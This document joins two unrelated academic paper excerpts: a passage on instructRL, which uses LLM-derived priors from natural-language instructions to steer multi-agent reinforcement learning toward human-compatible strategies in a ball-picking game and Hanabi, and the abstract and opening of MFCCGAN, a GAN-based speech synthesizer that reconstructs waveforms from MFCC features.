study the role of natural language in learning. On the relationship between natural language and the inductive bias of human learning, Kumar et al. (2022) show that training RL agents with the auxiliary tasks of predicting representations from human-generated natural language task descriptions leads to more human-like behavior. Their conclusion aligns well with our motivation that human's inductive bias makes us prefer policies that can be easily described in language. **Language for Exploration in RL:** Natural language has also been used to improve RL in various ways. The most relevant ones use language abstraction for exploration. Mirchandani et al. (2021) rewards the agent for finishing any semantically meaningful low-level such as 'picking up a key' and gradually build up a dataset for learning to correlate the high-level instructions with low-level descriptions. Tam et al. (2022) and Mu et al. (2022) use language or visual language models to discover novel states for intrinsic rewards at the semantic level. These works focus on learning a better policy in single agent RL setting by addressing the hard exploration problem. In comparison, our work focuses on the _equilibrium selection_ problem -- converging to a human-like equilibrium -- in multi-agent systems. These two problems are orthogonal. Even in environments where exploration is not an issue, such as our Say-Select example, we still need novel methods to obtain a human-like policy. **Foundation Models and In-Context Learning for RL:** Prior works have explored using foundation models for reward specifications in RL (Kwon and Sadigh, 2023; Fan et al., 2022). The in-context learning capability of the large foundation models (Brown et al., 2020; Bommasani et al., 2021) allows user to specify reward function with natural language descriptions. MineDojo (Fan et al., 2022) collects a large Figure 1: Illustration of one episode of the toy example. **Left**: At the beginning of the episode, two random balls are assigned with +1 while the others are assigned with -1. Alice says ‘1’ to Bob. Bob picks up ball #1 and the team gets +1 reward. **Middle**: The ball is put back to the table but now assigned with -1. Alice says ‘5’ to Bob and Bob picks up ball #5. **Right**: Now that all the balls have -1 reward. Alice says ‘5’ again to Bob. Bob realizes there must be no positive reward balls left, so he quits. scale multi-modal Minecraft dataset from the internet and trains a CLIP (Radford et al., 2021) style contrastive video-text model. It then uses the video-text model to provide dense reward for RL by computing the similarity between the embedding of in-game video clip and the embedding of the language description of the task. Apart from our focusing on the _equilibrium selection_ problem mentioned above, our method is also different in that it does not rely on purposely collected domain specific data but use an off-the-shelf large language models (LLMs) like GPT-3 together with the reward from the environment. Kwon and Sadigh (2023) utilize the in-context learning capability of LLM to design hard-to-specify reward functions for RL, such as versatility, fairness etc. Because the rewards from LLM is the only learning signal, their method can only be applied to small settings with few timesteps because LLMs need to understand the entire game logic and past history to make decision. In contrast, our work focuses on the settings where environment reward is crucial for learning optimal policies and LLMs help to steer the learning process to produce a policy that satisfy the language instruction. Thanks to this hybrid setup, we can apply it to more complex environments like Hanabi. **Human-AI Coordination:** There are three related research directions in human-AI coordination problems. The first one is to use human data to directly model human behavior (Carroll et al., 2019) or to regularize RL/search so that it learns expert level policies while staying close to human equilibria (Lerer and Peysakhovich, 2018; FAIR et al., 2022). The second direction is to design cognitively inspired learning algorithms (Laidlaw and Dragan, 2022; Hu et al., 2021; Cui et al., 2021) to produce more human-like policy than vanilla RL does. The final one seeks to produce a diverse set of policies (Lupu et al., 2021; Cui et al., 2023; Charakorn et al., 2022; Strouse et al., 2022) and train a common best response to them so that it may generalize better to unseen partners. Our work does not require human dataset but instead uses human specified language instructions and LLMs to train RL policies that matches human's preference for better coordination. It can be combined with methods from the second category to train more human-like policies that satisfies the instruction. As we show later in the experiment section, our method can also produce semantically different policies given different instructions, making it a compelling method for the third paradigm. ## 3 Background **MARL:** Multi-agent RL (MARL) is a powerful tool for learning strong agents in multi-agent environments. The environment consists of the state space \(\mathcal{S}\), \(N\) agents with their respective action space \(\mathbf{\mathcal{A}}=\mathcal{A}^{1}\times\cdots\times\mathcal{A}^{N}\). A transition function \(\mathcal{T}:\mathcal{S}\times\mathbf{\mathcal{A}}\rightarrow\mathcal{S}\) defines the dynamics of the environment. We consider the fully cooperative setting where a reward function \(r:\mathcal{S}\times\mathbf{\mathcal{A}}\rightarrow\mathbb{R}\) returns a _common payoff_ shared by all players given state \(s\) and joint action \(\mathbf{a}\). We focus on the partially observable setting where each agent has their own observation function \(\Omega:\mathcal{S}\rightarrow\mathcal{O}\). Although the coordination challenge exists in fully observable settings, it is more prominent under partial observability because the inference of other agents' true intention is much harder. The policy for each player \(\pi^{i}(a_{t}^{i}|\tau_{t}^{i})\) takes in an _action-observation history_\(\tau_{t}^{i}=\{\Omega^{i}(s_{1}),a_{1},...,a_{t-1},\Omega^{i}(s_{t})\}\) and outputs a distribution over its action space \(\mathcal{A}^{i}\). A joint policy is simply the collection of policies for all players \(\mathbf{\pi}=(\pi^{1},\dots,\pi^{N})\). The goal of MARL is to train a joint policy that achieves the maximum total return \(J(\mathbf{\pi})=\mathbb{E}_{\tau\sim\pi}R(\tau)\) where \(R(\tau)=\sum_{t=t_{0}}^{T}\gamma^{t}\cdot r_{t}\) is the total discounted return of a game. \(\gamma\) is the discounting factor. **LLMs:** Large language models (LLMs) (Brown et al., 2020) are generative text models trained on enormous datasets collected from Internet to predict next token given the context. With proper prompts (Wei et al., 2022; Kojima et al., 2022), LLMs have demonstrated impressive zero-shot or few-shot generalization capabilities on challenging tasks such as reasoning and arithmetic. Researchers have further fine-tuned LLMs using RL with human feedbacks (RLHF) (Ouyang et al., 2022) or instructions (Chung et al., 2022) to generate more consistent, higher quality results. ## 4 Method In this section, we introduce _instructRL_, a language augmented RL method that can converge to different equilibria given a language instruction. Specifically, we are interested in operationalizing instructRL in multi-agent settings for collaborating with humans. In such settings, the human partner can provide a language instruction guiding the joint equilibrium of the human-AI team. The core idea of instructRL is to first construct a prior policy using LLMs that is conditioned on two pieces of information: 1) the initial human instruction and 2) a language prompt that describes relevant observations based on rolling out the current policy in the environment. For instance, for our Say-Select example in Figure 1, we can give instruction _"Select the same number as Alice"_ to the Bob agent and the description of the current observations can be _"Alice said 1."_ We then train an RL agent, where its objective is regularized with the generated LLM prior as a reference policy. **LLM Prior Policy:** We construct the prior policy by letting an LLM to predict the probability of possible actions given the observation and the instruction. To do so, we essentially need to evaluate \(p_{\texttt{LLM}}[\texttt{lang}(a_{t})|\texttt{lang}(\tau_{t}^{i}),\texttt{ inst}]\) for all possible action at each time step, which requires language descriptions of observations \(\texttt{lang}(\tau_{t}^{i})\) and actions \(\texttt{lang}(a)\). We note that the language instruction inst_stays fixed_ during training, i.e., no active human feedbacks during the actual RL loop. The LLM observes the game through the language descriptions of the observations. In board game environments such as Hanabi and Diplomacy, the language description of current observation \(\tau_{t}^{i}\) can be generated automatically with simple rule-based programs. In fact, the language observations are often the most natural medium on which humans reason about these games. However, in real world scenarios that require grounding in the physical environment, we may use image captioning models (Radford et al., 2021) to generate descriptive languages of the scenes or extend our framework to allow humans to specify instructions in video format. We leave this for future explorations. In order for the LLM to evaluate whether an action is plausible given the instruction inst and the current observation \(\texttt{lang}(\tau_{t}^{i})\), we must also map each action to a language description (\(\texttt{lang}(a)\)). It is easy to convert actions to language descriptions in the games we consider in this paper. Prior works have also assigned language descriptions to high level robotics primitives so that they can use LLMs for task level planning in real world (Ahn et al., 2022; Huang et al., 2022). However, it is worth noting that many environments contain actions that cannot be easily abstracted in language, e.g., in a robotics setting, where the actions are the continuous joint angles of a robot arm. We note that this is a limitation of our work, but we are hopeful that with the active development of new multi-modal foundation models, the ideas of this work can be applied more broadly beyond LLMs -- enabling humans to effectively guide AI agents to reach more desirable equilibria. Having defined inst, \(\texttt{lang}(\tau_{t}^{i})\) and \(\texttt{lang}(a_{t})\), we can compute \(p_{\texttt{LLM}}=\textsc{Softmax}(\beta\cdot\texttt{logit})\) where \(\beta\) is an optional scaling factor and the logit is a function of the language components, i.e. \(\texttt{logit}=f(\texttt{inst},\texttt{lang}(\tau_{t}^{i}),\texttt{lang}(a_{ t}))\). For actions that have homogeneous descriptions, such as in Say-Select, the logit function \(f\) can simply be the prediction loss of the \(\texttt{lang}(a_{t})\) conditioned on some prompt that combines inst and \(\texttt{lang}(\tau_{t}^{i})\). Another option, which is later used in the Hanabi experiments, is to construct a question-answering style prompt that ask whether we should do \(\texttt{lang}(a_{t})\) given the instruction inst and current observation \(\texttt{lang}(\tau_{t}^{i})\). We set the logit to 1 if the probability of generating affirmative answers is greater than the probability of generating negative answers, and 0 otherwise. The LLM prior \(p_{\texttt{LLM}}\) itself is not sufficient to solve complex tasks. For example, a moderate-sized LM with roughly 6B parameters can not figure out when to quit in Say-Selectin Figure 1 and even the largest LM to date cannot play Hanabi in human level. Therefore, we still need to rely on RL to find good policies, but we guide the RL policy using the LLM prior described in this section as a regularizer to satisfy the language instructions provided by the human. **Regularized RL:** Regularization has been widely used in RL to encourage exploration (Mnih et al., 2016), or to encourage an RL policy to stay close to a given prior (Ziebart et al., 2008). Notably, regularizing RL policies towards a behavioral cloned policy trained on a massive human dataset was critical for mastering complex games such as Starcraft (Vinyals et al., 2019) and Diplomacy (Bakhtin et al., 2022). In this paper, we would like to similarly regularize an RL agent to guide the equilibria towards desirable behaviors. Instead of relying on massive amount of human data or hand-designed reward shaping, we enable the user to regularize the RL policy by providing language instructions. The LLM prior \(p_{\texttt{LLM}}\) effectively captures the human preferences, which allows us to instruct an RL agent towards human preferences. We thus refer to our algorithm as instructRL. We consider two types of regularization techniques for Q-learning and PPO respectively. For Q-learning (Mnih et al., 2015), we can simply augment the policy with \(\log p_{\texttt{LLM}}\). The exploration policy becomes \(a=\epsilon-\textsc{Greedy}(Q_{\theta}+\lambda\log p_{\texttt{LLM}})\) and the training becomes \[Q_{\theta}(\tau_{t}^{i},a_{t})\gets r_{t}+\gamma Q_{\theta}(\tau_{t+1}^{i },a_{t+1}^{\prime}),\] where \(a_{t+1}^{\prime}=\underset{a}{\operatorname{argmax}}[Q(\tau_{t+1}^{i},a)+ \lambda\log p_{\texttt{LLM}}(\tau_{t+1}^{i},a)]\). We refer to this version of instructRL as _instructQ_. For PPO (Schulman et al., 2017; 2017), we add a KL penalty term to the objective \(J(\theta)=\mathbb{E}_{\tau\sim\mathbf{\pi_{\theta}}}R(\tau)+\lambda\text{KL}(\pi_{ \theta}||p_{\texttt{LLM}})\). The policy loss becomes \[\mathbb{E}_{\tau\sim\mathbf{\pi_{\theta}}}\sum_{t}[-\log\pi_{\theta}(a_{t}|\tau_{t} ^{i})A_{t}+\lambda\text{KL}[\pi_{\theta}(\tau_{t}^{i})||p_{\texttt{LLM}}(\tau_ {t}^{i})]]\] where \(A_{t}=Q(\tau_{t}^{i},a_{t})-V(\tau_{t}^{i})\) is the advantage. The value loss remains unchanged. We refer to this as _instructPPO_. We summarize our method in Algorithm 1 and provide an illustration of the instructQ version in Figure 2. In addition, Figure 2: InstructQ. The differences between instructQ and normal Q-learning is highlighted in blue. we note that other regularization techniques, such as soft Q-learning (Haarnoja et al., 2017) or modifying the reward function to be \(r-\lambda\log\frac{\pi_{\theta}(a_{i}|\tau_{t}^{i})}{p_{\texttt{init}}(a_{t}|\tau_ {t}^{i})}\)(Ziegler et al., 2019), also fit into our instructRL framework. ## 5 Experiment In this section, we will demonstrate instructRL in two multi-agent coordination game settings: Say-Select in Sec. 5.1 and Hanabi in Sec. 5.2. We will open-source code and models for both experiments. ### Say-Select Experiment We first evaluate our method on Say-Select game shown in Figure 1. In this game, as discussed earlier, an intuitive solution for Bob is to pick up the ball \(\#k\) if Alice says \(k\) and for Bob to quit if Alice says a number that has appeared before. This is because if Alice repeats a number, the corresponding ball will have a negative reward, and thus any reasonable partner would not repeat a number twice if there are other playable balls with positive reward. The observation of Alice is a tuple containing the reward of every ball and the previous action of Bob. Alice's action space is saying a number from 1 to 5 referring to any of the 5 balls. It is sufficient to let Bob's observation to be the last two actions of Alice, as that would be enough for Bob to optimally respond to Alice, e.g., converge to the policy described earlier. In this game, we use instructQ for Bob, while allowing Alice to use vanilla Q-learning. We set the instruction for Bob inst = "I should select the same number as my partner". We map Bob's observation to text lang(\(\tau_{t}^{i}\)) by converting Alice's _most recent_ action (1 through 5) from integer to string. Note that the RL policy still observes the last two actions. For Bob's actions, we map them to string {"0", "1",..., "5"} with 0 for quitting and the remaining 1 through 5 for selecting the corresponding ball. We combine all these components to create the following prompt: "{inst}. _My partner selected lang(\(\tau_{t}^{i}\))._ _So I should select"_ We feed the prompt to an open-sourced GPT-J (Wang and Komatsuzaki, 2021) model with 6 billion parameters and use the prediction loss for the action strings as logits (Ahn et al., 2022). Finally, we apply Softmax to the logits with \(\beta=1\) to get the prior policy \(p_{\texttt{LLM}}\). We use tabular Q-learning with no neural network as the state space is small enough and regularization weight \(\lambda=0.25\) for instructQ. Details on the hyper-parameters are in Appendix A.1. **Result:** With instructQ, Alice and Bob always (10 out of 10 seeds) converge to the intuitive joint policy. In the converged joint policy, Alice says a number that corresponds to a \(+1\) reward ball if there any balls with positive reward are still left and repeats her most recent action otherwise, i.e., if there no \(+1\) reward balls are left. Bob quits if the last two actions from Alice are the same. Otherwise, he selects the ball with the same number as Alice says. Bob's policy is illustrated in the right plot of Figure 3. On the left and middle shows two policies from normal Q-learning, i.e., same hyper-parameters except for \(\lambda=0\). Although all Figure 3: Bob’s policy trained with different methods. Row values are Alice’s actions _two steps ago_ and column values are Alice’s actions _one step ago_. The value in each cell is Bob’s action when observing Alice’s past two actions. Here Bob’s actions are 1 through 5 (shown in different shades of blue) for selecting different balls and “Q” (shown in yellow) refers to Bob quitting. **Left** and **Middle**: Two policies from vanilla Q-learning but with different seeds. **Right**: Policy from instructQ with \(\lambda=0.25\). We note that all three policies shown here are optimal in self-play, but only the InstructQ policy is the intuitive policy that follows inst=“I should select the same number as my partner”. three policies are _optimal_ in self-play, the instructQ policy is clearly easier for human to coordinate with. The language instruction associated with the instructQ policy makes it effortless to understand Alice's intents even without any explicit communication. ### Hanabi Experiment Hanabi is a fully cooperative card game that is often used as a benchmarking environment for MARL and human-AI coordination (Bard et al., 2020). It requires implicit communication through actions and reasoning about other people's intentions. In this section, we first introduce the rules of Hanabi, followed by two different strategies that are commonly used by humans. Then we show that both instructQ and instructPPO can produce these two strategies given their corresponding language instructions. Finally, through human evaluation, we show that humans and AI can coordinate much more effectively when they know the instructions used in training of the RL agents. They also think that the agents' policies satisfy the language instructions and the language helps them better coordinate with the agents. **Hanabi rules and strategies:** We consider the 2-player version of Hanabi in this paper. The deck in Hanabi consists of 5 color suits. Each suit has 10 cards divided into 5 ranks with three 1s, two 2s, two 3s, two 4s and one 5. The players need to collaborate to play exactly 5 cards of each color in increasing order of rank. For example, when no cards have been played, the 1s of all colors are valid play. If a red 1 has been played, then the red 2 or the 1s of other colors are valid play, etc. Each player maintains five cards in their hands. They can see their partner's cards but not their own, so they need to use hints to inform their partner. Players take turns to move. In each turn, the active player can either play a card, discard a card, or hint a color/rank to their partner, which informs the recipient which cards in their hand have that specific color/rank. The game terminates if the player plays an unplayable card for 3 times or when the deck is exhausted. The final score of the team is 0 in the first case and equals to the number of cards played in the second case. The maximum score is therefore 25. The strategies in Hanabi are centered around giving hints. The game starts with 8 hint tokens. Players consume a hint token when they hint and regain a token when they discard. Therefore, they often need to discard cards at certain pace to get playable cards and also recoup hint tokens. Because there are only limited copies of each card value, players need to use hint not only to tell their partner which card to play, but also which card to save. For example, if our partner is holding the only red 3 left in the game but red 3 is currently not playable, we may want to tell them the importance of this card by either hinting color red or hinting rank 3 to them. The dual purpose of the hint actions make the game challenging because they may be misinterpreted, especially when the card we want to save shares some property with other cards in the partner's hand. A common strategy that experienced players use is to designate hinting colors to indicate playable cards and hinting ranks to indicate cards that need to be saved. We refer to this as the _color-based_ policy. Alternatively, we can swap the role of hinting color and hinting rank to get a different but equally reasonable _rank-based_ policy. See Appendix B for a more intuitive illustration with a picture of an actual game. **Setup:** First, we show that instructRL can produce the two policies mentioned above with different language instructions. Specifically, we use instructRL with instruction inst\(\_\)color = "_If my partner tells me the 'color' of some of my cards, I should 'play' those specific cards. If my partner does something else, e.g. discards their card or tells me the 'rank' of my cards, then I may 'hint color' to my partner"_ to produce the color-based policy. By swapping "_rank"_ for "_color"_ and "_color"_ for "_rank"_, we get inst\(\_\)rank and use it produce the rank-based policy. We use the 175B parameter GPT-3.5 named text-davinci-003 as our LLM. \begin{table} \begin{tabular}{l l} \hline \hline Action type & Text observation example \\ \hline Null & My partner did nothing \\ Discard & My partner discarded their card at position ‘A’ \\ Play & My partner played their card at position ‘B’ \\ Hint rank & My partner told me that the rank of my card at position ‘D’ is two \\ Hint color & My partner told me that the color of my cards at positions ‘A’ and ‘C’ is red \\ \hline \hline \end{tabular} \end{table} Table 1: Examples of text observation lang\((\tau_{t}^{i})\) for partner’s all 4 types of past actions. We use position A,B,C,E,D to refer to different cards in hand with A being the oldest position. Null means that it is the beginning of the game. \begin{table} \begin{tabular}{l l} \hline \hline Action type & Language description example \\ \hline Discard & discard my card at position ‘B’ \\ Play & play my card at position ‘A’ \\ Hint rank & hint rank to my partner \\ Hint color & hint color to my partner \\ \hline \hline \end{tabular} \end{table} Table 2: Examples of language descriptions for actions lang\((a_{t})\). Note that we map all 5 hinting rank actions to the same language (same for hinting color actions). The observation in Hanabi contains lots of information such as the partner's hand, which cards have been played or discarded, previous actions, etc. It is challenging for LLMs to digest language descriptions of the entire observation. Since our instructions mainly capture the high level relationships between partner's actions and our response, we design the language description function \(\texttt{lang}(\tau_{i}^{t})\) to return the partner's last action in text. Table 1 shows examples of text observations \(\texttt{lang}(\tau_{t}^{i})\) for all types of past actions that our agent may observe. We use letters A, B, C, D and E instead of 1st, 2nd, 3rd, 4th and 5th to refer to different hand positions to avoid spurious correlations between card positions and ranks. Similarly, it is straightforward to convert the actions to language descriptions. Examples of \(\texttt{lang}(a_{t})\) are shown in Table 2. We combine the instruction, observation and action together using the following prompt: _Instruction:_ {inst}. _Previously:_ {lang(\(\tau_{i}^{t}\)). _Question: Should I_ {lang(\(a_{t}\))}? _Answer:_ Then we ask GPT-3.5 to predict the next token and set the logit of the action to be 1 if \(p(\text{yes})>p(\text{no})\) and 0 otherwise. The question answering style template is inspired by NLP works (Chung et al., 2022; Wei et al., 2022) that study how to prompt LLMs effectively. We pre-compute the logits for all \(\texttt{lang}(\tau_{i}^{t})\) and \(\texttt{lang}(a_{t})\) pairs and cache them before training RL. During the RL training, we compute the prior policy \(p_{\texttt{LLM}}=\texttt{Softmax}(\beta\cdot\text{logit})\) over the legal actions at each time step. The total GPT API bill for this project, including the cost for tuning the instructions and cost for additional studies in the Appendix, is roughly US$200. Note that we set the logit to 0 or 1 instead of using the actual probability of generating the action text for two reasons. First, we do not need a fine-grained prior policy from the LLM because it does not take the game rule as input and only observes limited information. The LLM prior policy only needs to provide a coarse guidance to bias the RL agent to converge to desired equilibria. Second, we do not want the RL agent to suffer from the inherent biases of the LLM because they can lead to sub-optimal outcomes. For example, under inst_rank, if previously my partner told me that the rank of my card A and C is 1, then LLM gives higher probability for yes if the action is to play card B (\(4\%\)) than if the action is to play card E, F (\(<0.01\%\)). In Appendix C, we include a more detailed analysis on the instructions by comparing the LLM predictions with a rule-based oracle in C.1. We also have robust analysis for instructRL with simpler instructions and noisy LLM priors in Appendix C.2 and C.3 respectively. We implement instructQ and instructPPO based on the open sourced repository of off-belief learning (OBL) (Hu et al., 2021). The most noteworthy implementation detail is that we train all our models by fine-tuning an OBL level 1 policy instead of training from scratch and we anneal \(\lambda\) as training progresses. The Q-learning and PPO baselines use the same setting except for \(\lambda=0\). More discussions on this and other implementation details is in Appendix A.2. **Results:** We first investigate the performance and reproducibility of instructQ and instructPPO with both color and rank instructions. From Table 3, we see that under both color and rank instructions, two instructRL variants achieve similar self-play (evaluating agents with themselves) and intra-AXP (intra-algorithm cross-play: evaluating pairs of agents trained with the same method but different seeds) scores as their vanilla counterparts. Intra-AXP is an im Figure 4: Conditional action matrix \(p(a_{t+1}|a_{t})\) for different agents. We only show most relevant action pairs for conciseness. The row values are the actions from the active player at time step \(t\). **Cr** through **Cw** correspond to the action of hinting color red, green blue yellow and white respectively. **R1** through **R5** correspond to the actions of hinting rank 1 through 5. The column values are the actions from the active player at time step \(t+1\). **P1** through **P5** correspond to playing the card at position 1 through 5 with 5 being the newest position. For each cell \(p_{(i,j)}\), we first count all occurrences of the action pair over 1000 games and then normalize it \(\sum_{i,j}p_{i,j}=1\). Bright yellow means high probability and dark blue means low probability. All the policies focus on playing their newest cards but they demonstrate different hinting strategies. \begin{table} \begin{tabular}{l c c} \hline \hline Method & Self-play & Intra-AXP \\ \hline Q-learning & 23.96 \(\pm\) 0.05 & 23.77 \(\pm\) 0.07 \\ InstructQ (color) & 23.78 \(\pm\) 0.05 & 23.77 \(\pm\) 0.06 \\ InstructQ (rank) & 23.92 \(\pm\) 0.02 & 23.78 \(\pm\) 0.05 \\ \hline PPO & 24.25 \(\pm\) 0.01 & 24.25 \(\pm\) 0.01 \\ InstructPPO (color) & 24.25 \(\pm\) 0.03 & 24.23 \(\pm\) 0.01 \\ InstructPPO (rank) & 24.10 \(\pm\) 0.02 & 24.08 \(\pm\) 0.02 \\ \hline \hline \end{tabular} \end{table} Table 3: Performance of different algorithms. We run 3 different seeds for each method. **Self-play**: evaluate the agents with themselves. **Intra-AXP** (intra-algorithm cross-play): evaluate pairs of agents trained with the same method but different seeds. A small gap between Intra-AXP and self-play indicates that the learning algorithm consistently converges to roughly the same solution. portant sanity check because a method is unlikely to work well for human-AI coordination if the agents trained by the method cannot coordinate with other agents trained with the same method but different seeds. The small gap between Intra-AXP and Self-play of the tested method indicates that they converge to nearly identical policies across different seeds, meeting the precondition for human-AI coordination. We then evaluate whether the policies are semantically different under different instructions and whether they satisfy the instructions. In Figure 4, we plot the conditional action matrix \(p(a_{t+1}|a_{t})\) that shows the agent's response to partner's actions marginalized over time step \(t\) in 1000 self-play games. All agents focus on hinting and playing the 5th (newest) card. The vanilla Q-learning agent uses a mixture of both color and rank hints to indicate playable cards. For instructQ and instructPPO, however, the agents heavily bias towards using the type of hints that they are instructed to use. This evidence alone is not sufficient to conclude that the agents' policies satisfy their instructions because the card played may have nothing to do with the hints. In Figure 5, we check what kind of knowledge the agents have on the cards being played when they play a card. All agents primarily (\(\geq 98\%\) of the time) play cards that they have knowledge about. The instruct agents rely significantly more on the type of hints that the instructions tell them to use. Videos of the games played by instructRL agents are available on the website for more intuitive illustration of different policies. **Human evaluation:** We ask 10 humans to evaluate the instructQ agents and the Q-learning baseline. Each participant plays with the Q-learning agent (_Q-learning_), one of the instructQ (color) or instructQ (rank) agent without seeing the corresponding language instructions (_instructQ w/o L_), and the remaining instructQ agent after seeing the instruction that it is trained to follow _(instructQ with L)_. The results are shown in Table 4. Without knowing the language, two instructQ agents get comparable results with the Q-learning baseline. However, when the language instructions are shown to the human partners, they achieve significantly higher scores and lose only 1 out of 10 games due to failed coordination. For the instructQ with language setting, we also ask the user two questions using 7-point Likert scale: 1) _On the high level, the bot's strategy satisfies its instruction mentioned above._ 2) _The language instruction helps me better collaborate with the bot._ and the scores are 6.00 \(\pm\) 0.24 and 6.20 \(\pm\) 0.31 respectively. The results not only demonstrate that instructRL produces semantically different policies that follow the instructions, but also verify our observation that language communication is tremendously beneficial in human-AI coordination. We also ask additional questions for all agents (shown in Figure 6) and the results also confirm that knowing the instructions make the coordination experience much better. Although the policies behind the orange and green bars are the same, humans think they are easier to understand, more predictable and trustworthy after seeing the language. **Additional experiments on robustness and test-time adaptation:** In Appendix C, we include additional experiments on the robustness of instructRL where we show that instructRL works well with less perfect prior policies generated with simpler, less prompt-engineered instructions. We also study how the performance deteriorates as we ran \begin{table} \begin{tabular}{l c c} \hline \hline Method & Score & Game lost \\ \hline Q-learning & 9.80 \(\pm\) 3.35 & 5/10 \\ InstructQ w/o L & 7.80 \(\pm\) 3.23 & 6/10 \\ InstructQ with L & **18.70 \(\pm\) 2.18** & **1/10** \\ \hline \hline \end{tabular} \end{table} Table 4: Human evaluation results. Each player plays with the Q-learning agent, one of the instructQ agent without knowing its language instruction and the other instructQ agent knowing its language instruction in _random order_. **Score** shows mean \(\pm\) standard error. **Game lost** shows how many games are terminated because all 3 lives are lost. Figure 5: Knowledge of cards when the agent plays those cards. The knowledge of the cards is either revealed by hints or inferred public knowledge such as counting the remaining cards. **Only color**: player knows the color but not the rank. **Only rank**: player knows the rank but not the color. **Both**: player knows exactly what the card is. **None**: player knows nothing about this card. Figure 6: Human feedback on 3 subjective questions. The conclusion is consistent with that from the actual scores. Knowing the language instructions significantly improves the humans’ experience when coordinate with the agents. domly corrupt the LLM prior. In Appendix D we show that adding the LLM prior to the fixed Q-learning agents decreases the self-play performance of the agents while brings little improvement on their coordination performance with the corresponding instructQ agents, which encourages more future works along the line of _test-time_ adaption with language instructions. ## 6 Conclusions In this paper we present instructRL, a framework for better human-AI coordination by training RL agents to follow natural language instructions that specify how the human would like to coordinate with AI. Instead of collecting labeled human data, we achieve this goal by using LLMs to construct prior policy conditioned on the instruction and use it to regularize RL to converge to the most desirable equilibria. Through both qualitative analysis and human evaluations, we show that instructRL converges to policies that satisfy the language instruction and humans can coordinate with RL agents much better if they are given the associated instructions used to train the agents. There are many exciting future directions, such as the problem of test-time adaption with language instructions detailed in Appendix D. As LLMs become more powerful, it will also be interesting to extend this work with more fine-grained instructions or enable users to specify instructions in more flexible ways, such as human-AI dialogues. ## 7 Acknowledgments We would like to thank participants of the Hanabi human evaluation for playing with our agents We also thank the members of the Stanford ILIAD lab for their support and feedbacks during the development of this project and thank Samuel Sokota for discussions on different regularization techniques. This works was supported by JP Morgan Faculty Award, DARPA YFA, AFOSR, ONR and NSF Award #2006388 and #2125511.
2306.12785
MFCCGAN: A Novel MFCC-Based Speech Synthesizer Using Adversarial Learning
In this paper, we introduce MFCCGAN as a novel speech synthesizer based on adversarial learning that adopts MFCCs as input and generates raw speech waveforms. Benefiting the GAN model capabilities, it produces speech with higher intelligibility than a rule-based MFCC-based speech synthesizer WORLD. We evaluated the model based on a popular intrusive objective speech intelligibility measure (STOI) and quality (NISQA score). Experimental results show that our proposed system outperforms Librosa MFCC- inversion (by an increase of about 26% up to 53% in STOI and 16% up to 78% in NISQA score) and a rise of about 10% in intelligibility and about 4% in naturalness in comparison with conventional rule-based vocoder WORLD that used in the CycleGAN-VC family. However, WORLD needs additional data like F0. Finally, using perceptual loss in discriminators based on STOI could improve the quality more. WebMUSHRA-based subjective tests also show the quality of the proposed approach.
Mohammad Reza Hasanabadi Majid Behdad Davood Gharavian
2023-06-22T10:29:24Z
http://arxiv.org/abs/2306.12785v1
# MFCCGAN: A Novel MFCC-Based Speech Synthesizer Using Adversarial Learning ###### Abstract In this paper, we introduce MFCCGAN as a novel speech synthesizer based on adversarial learning that adopts MFCCs as input and generates raw speech waveforms. Benefiting the GAN model capabilities, it produces speech with higher intelligibility than a rule-based MFCC-based speech synthesizer WORLD. We evaluated the model based on a popular intrusive objective speech intelligibility measure (STOI) and quality (NISQA score). Experimental results show that our proposed system outperforms Librosa MFCC-inversion (by an increase of about 26% up to 53% in STOI and 16% up to 78% in NISQA score) and a rise of about 10% in intelligibility and about 4% in naturalness in comparison with conventional rule-based vocoder WORLD that used in the CycleGAN-VC family. However, WORLD needs additional data like F0. Finally, using perceptual loss in discriminators based on STOI could improve the quality more. WebMUSHRA-based subjective tests also show the quality of the proposed approach. Mohammad Reza Hasanabadi, Majid Behdad, Davood Gharavian Shahid Beheshti University, Tehran, Iran, {m_hasanabadi, m_behdad, d_gharavian}@sbu.ac.ir **Index Terms**- MFCC feature inversion, speech coding, speech synthesis, generative adversarial learning, perceptual optimization ## 1 Introduction Signal reconstruction is an important part of almost any system containing synthesizers [1, 2] such as coding [3], text-to-speech [4], speech enhancement [5], and voice conversion systems [6]. In some cases, having features extracted and processed, recovering the original signal for posterior use is challenging. Since some feature extraction methods use nonlinear transforms, getting the signal back is not as easy as feature extraction. The limitation of bandwidth constrains the functionality of such systems. Quality and bitrate (available bandwidth) are relevant attributes that usually happen together. Often, the more the bit rate you dedicate, the more quality you get. However, available bandwidth is usually a big challenge to deal with. In such conditions, finding codecs capable to improve quality and decrease bandwidth simultaneously is of great importance. So far, communication systems incorporate several kinds of audio codecs depending on complexity, latency, bandwidth needed, and quality [7]. Most domestic PSTN centers operate at an 8 kHz sampling rate and 8-bit non-linear quantization according to ITU-T G.711, which results in 64 kbps encoding. GSM family including Full Rate (GSM-FR), Half Rate (HR), and Enhanced Full Rate (EFR), were among the first digital speech coding standards introduced to use in GSM (Global System for Mobile Communication). They operate at an average bit rate of 13 kbps, 5.6 kbps, and 12.2 kbps respectively [7]. Albeit GSM-EFR consumes less bandwidth in comparison with FR, it provides better speech quality and robustness in facing network impairments. MELPe (Mixed-Excitation Linear Predictive) vocoder algorithm, which operates at both 1.2 and 2.4 kbps is a very low-bit rate codec selected by the United States Department of Defense [8, 9]. Speex [10] is another audio compression suitable to handle VoIP and internet audio streaming. Based on the CELP algorithm [11], it operates at bit rates ranging from 2.2 to 44 kbps. Changing bit rate dynamically makes Speex among the few codecs providing Variable Bit-Rate (VBR). While traditional rule-based methods often fail to recover signals out of their features due to nonlinearities in the process of extraction, learning-based approaches present a framework to reconstruct signals better out of their features. Big data availability facilitates learning complex models. Deep neural networks play an important role in modeling complex and nonlinear behaviors. Convolutional Neural Networks (CNN), Variational Auto Encoders (VAE), and Generative Adversarial Networks (GAN) are important classes of deep learning models. These classes apply to various fields of speech processing such as speech recognition, synthesis, coding, voice conversion, and so on. Van den Oord et al. introduced WaveNet [13], a deep neural network for generating raw audio waveform. It is an autoregressive generative model, which predicts each output audio sample conditioned on some previous ones. WaveNet is based on PixelCNN, which was first introduced for image generation [14]. Although WaveNet is usually applied for text-to-speech purposes, it can adapt to coding applications. W. Bastiaan Kleijn et al. [15] suggested WaveNet generates high-quality speech from the bit stream of 2.4 kbps. C. Garbacea et al. also combined WaveNet and VQVAE [16] to produce low-bit-rate speech coding. WaveGlow is also another decoder to generate high-quality speech from Mel-spectrograms without the need for autoregression [17]. LPCNet [18], a WaveRNN [19] variant, combines linear prediction with recurrent neural networks to improve the efficiency of speech synthesis. Autoregressive models, such as WaveNet, model local structure but have slow iteratve sampling and lack global latent structure. In contrast, 